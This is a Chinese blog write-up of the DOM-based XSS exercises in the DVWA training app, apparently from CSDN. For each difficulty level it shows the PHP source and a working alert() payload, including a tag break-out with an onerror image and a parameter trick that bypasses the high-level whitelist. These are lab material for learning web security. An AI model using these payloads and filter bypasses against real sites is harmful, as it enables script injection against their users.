DVWA上XSS(DOM)(基于 DOM 的跨站脚本)全难度

最新推荐文章于 2024-06-19 01:26:59 发布
最新推荐文章于 2024-06-19 01:26:59 发布
阅读量709 收藏
点赞数
文章标签: php Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74456293/article/details/128792057
版权

跨站脚本攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。

DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。

一、low难度

  1. 源码

<?php

# No protections, anything goes

?>

打开源代码分析之后发现服务端并没有任何的PHP代码,所以说执行判断的只有客户端的JavaScript代码

2、直接在URL中通过修改default参数上传XSS注入,我们尝试一下看看插入一条XSS语句会有什么变化,将default后面的参数修改为:<script>alert(1)</script>

可以看出我们成功了。

二、Medium难度

1、源码

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

简单来说,就是过滤掉了“<script”,当函数匹配到 <script 字符串的时候就会将URL后面的参数修正为 ?default=English

2、在这里可以通过onerror事件,在装载文档或图像的过程中如果发生了错误就会触发

</option></select><img src=x onerror=alert(1)>

三、High难度

1、源码

 <?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

设置了白名单,只对default进行检查。

2、可以使用&连接另一个自定义变量来绕过构造。

&<script>alert(1)</script>

四、Impossible难度

源码:

<?php

# Don't need to do anything, protction handled on the client side

?>

不需要做任何事情,保护由客户端处理。

踏雪寻玉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透--47--基于DOMXSS
武天旭的博客
09-22 1771
1、漏洞描述 文档对象模型(Document Object Model),即DOM。是用来在浏览器中表示文件的结构格式。DOM支持动态脚本,诸如JavaScript来引用文档组件,如表单字段或会话cookie。DOM也用于浏览器的安,例如限制在不同域的脚本获取其它域的cookie会话。当活动内容(如JavaScript函数)被特制的请求修改时,可能会出现基于DOMXSS漏洞,这样能够使得攻击者可以控制DOM元素。
第一节 XSS脚本分类-01
09-15
XSS脚本分类 XSS 跨站脚本攻击是一种常见的 Web 应用程序安漏洞,攻击者可以通过在 Web 页面中插入恶意 Script 代码来攻击用户。为了防止 XSS 攻击,需要了解 XSS 的分类和特点。 XSS 漏洞介绍 XSS ...
XSS脚本DOMXSS
08-23 1836
XSS脚本DOMXSS
跨站脚本攻击漏洞(XSS):基础知识和防御策略
weixin_43263566的博客
01-16 9559
跨站脚本攻击漏洞-基础篇
Web安基础学习:XSS脚本漏洞之DOMXSS
最新发布
qq_51862722的博客
06-19 1102
DOMXSS漏洞:非持久型XSS,且不与后台服务器产生数据交互,而是通过JS修改网页的DOM来执行恶意脚本进行攻击。注意,DOMXSS与反射型和存储型最大的区别在于,DOMXSS不经过服务端,部的攻击过程都在客户端完成。
DomXSS跨站脚本攻击和防御
认知 行动 坚持
07-05 8238
在前面的文章中,我们讲了持久型XSS和反射型XSS, 我个人觉得这些命名真的很贴切,反应了概念的本质。 无论是持久型XSS还是反射型XSS, 恶意的js脚本内容都需要由服务端返回给用户,今天我们要说的DomXSS却例外,一起来看看。
跨站脚本攻击XSS介绍、原理、分类、利用、防御
qq_37432174的博客
11-22 3096
跨站脚本攻击,恶意攻击者插入恶意Html或Script等脚本代码到用户浏览的web网页上,当用户浏览该页之时,因WEB应用程序对用户输入过滤不足,嵌入其中Web里面的恶意脚本代码会被执行,从而达到恶意攻击用户的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完控制了WEB客户端的逻辑,在这个基础上,黑客可以轻易地发起Cookie窃取,会话劫持,钓鱼欺骗等各种各样的攻击。
攻击(XSS+CSRF).docx
01-05
3. DOMXSS:此类XSS发生在客户端,攻击者通过改变页面的DOM(Document Object Model)结构来注入恶意脚本,无需服务器参与,只需要用户访问被篡改的页面即可触发。 【CSRF攻击详解】 CSRF(Cross-Site Request ...
web安技术-实验七、跨站脚本攻击xss)(反射型).doc
08-20
跨站脚本攻击XSS)概述】 XSS称Cross Site Scripting,是一种常见的Web应用程序安漏洞,攻击者利用此漏洞向网页中注入恶意脚本,当其他用户浏览该页面时,这些脚本会被执行,从而可能窃取用户的敏感信息...
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSSDOMXSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
渗透测试初学者资源 DVWA压缩包
12-23
DVWA的设计目的是提供一个安漏洞的实战平台,涵盖了SQL注入、XSS脚本)、CSRF(请求伪造)等常见的Web应用安问题。在安装和使用DVWA之前,你需要确保你的操作系统是Windows 7或更高版本,并且已经安装...
【Web篇】(6.3) ❀ 10. 脚本 - DOMXSS ❀ FortiWeb 攻防演练
防火墙技术专栏
07-22 1682
  【简介】脚本(Cross-site scripting,简称:XSS)是一种网应用程序的安漏洞攻击,是代码注入的一种。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。从而使目标计算机收到危害。 DOMXSS   DOM称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。   DOMXSS其实是一种特殊类型的反射型X.
渗透测试技术----常见web漏洞--跨站脚本攻击原理及防御
wwl012345的博客
08-16 3165
一、跨站脚本攻击介绍 1.跨站脚本攻击简介 跨站脚本攻击(Cross-Site Scripting)简称为XSS(本来为CSS,但是与前端语言CSS容易产生歧义,故取名为XSS),XSS是一种针对于网应用程序(Web客户端)的安漏洞攻击技术,是代码注入的一种,它允许攻击者将恶意JS代码注入到网页,这样其他用户在访问网页时就会受到影响。攻击者利用XSS代码攻击成功后,可能得到一些高权限来执行一...
脚本XSS)的介绍
专注于大数据方向,区块链,前后端,数据可视化,人工智能等领域
06-14 3004
脚本XSS) 攻击是一种注入,其中 恶意脚本被注入到其他良性和受信任的脚本中 网。当攻击者使用 Web 应用程序执行以下操作时,会发生 XSS 攻击 发送恶意代码(通常以浏览器端脚本的形式)到 不同的最终用户。允许这些攻击成功的缺陷是 相当普遍,并且发生在 Web 应用程序使用来自 用户在其生成的输出中,而无需对其进行验证或编码。攻击者可以使用 XSS 向毫无戒心的人发送恶意脚本 用户。最终用户的浏览器无法知道脚本应该 不可信,并将执行脚本
跨站脚本攻击XSS)分类介绍及解决办法
半夏_2021的博客
04-26 2万+
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安
DVWADOM XSS(DOM跨站脚本攻击)
热门推荐
谢公子的博客
10-03 2万+
目录 Low Medium High Impossible Low 源代码: &lt;?php # No protections, anything goes ?&gt; 从源代码可以看出,这里low级别的代码没有任何的保护性措施! 页面本意是叫我们选择默认的语言,但是对default参数没有进行任何的过滤 所以我们可以构造XSS代码,访问链接: http://127...
pikachu靶场第八关——XSS脚本)之DOMxss(附代码审计)
yzasts的博客
03-20 844
简单来说DOM文档就是一份XML文档,当有了DOM标准之后,DOM便将前端html代码化为一个树状结构,方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式,且不需要经过服务端,所以DOMxss在js前端自己就可以完成数据的输入输出,不与服务器产生交互,这样来说DOMxss也可以理解为反射性xss。onkeypress当键盘上的某个键被按下并且释放时触发的事件.[注意:页面内必须有被聚焦的对象]onkeyup 当键盘上某个按键被按放开时触发的事件[注意:页面内必须有被聚焦的对象]
脚本xss
小雨的博客
04-24 334
目录 什么是xss 原理 攻击类型 反射型xss 存储型xss 基于domxss 攻击者用xss干啥 内容安策略csp 如何防止xss xss是个web漏洞,攻击者可以破坏用户和web app之间的交互,攻击者可规避同源策略。 什么是xss 通常攻击者伪装成受害者用户,执行用户能够执行的操作,访问用户的数据,如果用户具有特权访问权限,攻击者就能够完成控制应用程序的所有功能和数据 原理 操作一个易受攻击的网,利用其向用户返回恶意的js,当恶意代码在受害者的浏览器执行的..
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)攻击则是通过在DOM中注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值